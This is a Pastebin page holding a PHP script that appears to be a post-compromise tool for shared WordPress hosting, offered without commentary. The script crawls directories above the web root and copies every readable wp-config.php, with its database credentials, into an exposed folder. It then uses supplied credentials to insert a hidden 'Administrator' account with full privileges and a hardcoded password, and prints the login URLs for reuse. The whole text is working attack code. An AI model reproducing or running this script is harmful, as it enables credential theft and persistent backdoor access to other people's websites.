Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- @ini_set('memory_limit','256M');
- function query($connect, $prefix, $user) {
- try{
- $id = rand(80, 600);
- $query1 = mysqli_query($connect, "SELECT * FROM " . $prefix . "options where option_name='siteurl'");
- while ($siteurl = mysqli_fetch_array($query1)) {
- $site_url = $siteurl['option_value'];
- }
- $query2 = mysqli_query($connect, "INSERT INTO " . $prefix . "users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ( " . $id . ", '" . $user . "','b69d8af222106f687d7a086c24232387','" . $user . "','support@wordpress.org','','2011-06-07 00:00:00','','0','" . $user . "');");
- $sql1 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
- $sql2 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_user_level','10');");
- $sql3 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
- $sql4 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "user_level','10');");
- if ($query1 && $query2 && $sql1 && $sql2) {
- echo "$site_url/wp-login.php," . $user . ",StrongPass154$$\n";
- }
- // else{
- // echo $site_url;
- // }
- }catch (Exception $e){
- // do nothing... php will ignore and continue
- }
- }
- if (isset($_GET['change'])) {
- $lines = explode("\n", $_POST['config']);
- foreach ($lines as $line) {
- try{
- $data = explode(',', $line);
- $host = $data[0];
- $user = $data[1];
- $pass = $data[2];
- $name = $data[3];
- $prefix = $data[4];
- // echo $host .' '. $user .' '. $pass .' '. $name;
- $connect = mysqli_connect($host, $user, $pass, $name);
- if ($connect) {
- $check_availability = mysqli_query($connect, "SELECT * FROM " . $prefix . "users WHERE (user_login = 'Administrator' OR user_login = 'Wpadmin') AND (user_pass = 'b69d8af222106f687d7a086c24232387' OR user_pass = '\$P\$B/BHu2715erD4cr2tF0p5QXanN6PqS1');");
- if (mysqli_num_rows($check_availability) < 1) {
- query($connect, $prefix, 'Administrator');
- }
- mysqli_close($connect);
- }
- }catch (Exception $e){
- // do nothing... php will ignore and continue
- }
- }
- die();
- }
- function file_get_contents_utf8($fn) {
- $content = file_get_contents($fn);
- return mb_convert_encoding($content, 'UTF-8',
- mb_detect_encoding($content, 'UTF-8, ISO-8859-1', true));
- }
- function save($filename, $mode, $file) {
- $handle = fopen($filename, $mode);
- fwrite($handle, $file);
- fclose($handle);
- return;
- }
- function go($m_dir, $p) {
- global $script;
- @mkdir('wp_dir', 0755);
- $htaccess = "Options all\nDirectoryIndex doesntexist.htm\nSatisfy Any";
- save("wp_dir/.htaccess","w", $htaccess);
- if ($p == '../../') {
- $depth = 6;
- }elseif ($p == '../') {
- $depth = 5;
- }else {
- $depth = 4;
- }
- $dir = new RecursiveDirectoryIterator($m_dir . $p, RecursiveDirectoryIterator::SKIP_DOTS);
- $iterator = new RecursiveIteratorIterator($dir);
- $iterator->setMaxDepth($depth);
- $n = 0;
- foreach ($iterator as $file) {
- // echo $file . PHP_EOL;
- $n += 1;
- if ($file->getBaseName() == 'wp-config.php') {
- if (is_readable($file)) {
- $file_data = file_get_contents_utf8($file);
- $p = "Wordpress-$n.txt";
- echo $p . PHP_EOL;
- $fopen = fopen("wp_dir/$p", "w");
- fputs($fopen, $file_data);
- $flag = true;
- }
- }
- }
- if ($flag) {
- echo "aofhnjkq198a";
- }
- }
- $doc_r = str_replace("//", "/", str_replace("\\", "/", $_SERVER['DOCUMENT_ROOT'])).'/';
- if (is_readable($doc_r . '../../')) {
- go($doc_r, '../../');
- }elseif (is_readable($doc_r . '../')) {
- go($doc_r, '../');
- }else{
- go($doc_r, '');
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement